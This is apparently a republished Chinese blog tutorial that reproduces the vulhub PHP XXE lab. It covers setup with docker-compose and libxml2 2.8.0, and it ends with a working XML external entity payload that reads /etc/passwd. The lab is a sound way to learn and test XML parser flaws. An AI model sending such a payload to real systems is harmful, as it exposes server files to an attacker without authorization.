编程语言
首页 > 编程语言> > vulhub漏洞—php环境XML外部实体注入漏洞(XXE)

vulhub漏洞—php环境XML外部实体注入漏洞(XXE)

作者:互联网

PHP环境 XML外部实体注入漏洞(XXE)

XXE知识总结

环境介绍:

libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡。为了演示PHP环境下的XXE漏洞,本例会将libxml2.8.0版本编译进PHP中。PHP版本并不影响XXE利用。

vulhub搭建漏洞:

github位置:https://github.com/vulhub/vulhub/tree/master/php/php_xxe

使用如下命令编译并启动环境:

docker-compose up -d

环境启动后,访问http://your-ip:8080/index.php即可看到phpinfo,搜索libxml即可看到其版本为2.8.0。

image-20211217162815849

复现漏洞

Web目录为./www,其中包含4个文件:

$ tree .
.
├── dom.php # 示例:使用DOMDocument解析body
├── index.php
├── SimpleXMLElement.php # 示例:使用SimpleXMLElement类解析body
└── simplexml_load_string.php # 示例:使用simplexml_load_string函数解析body

dom.phpSimpleXMLElement.phpsimplexml_load_string.php均可触发XXE漏洞,具体输出点请阅读这三个文件的代码。

简单的 XXE Payload:

POST /simplexml_load_string.php

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<name>&xxe;</name>
</root>

标签:vulhub,XML,PHP,string,漏洞,XXE,php
来源: https://blog.csdn.net/weixin_45808483/article/details/122000030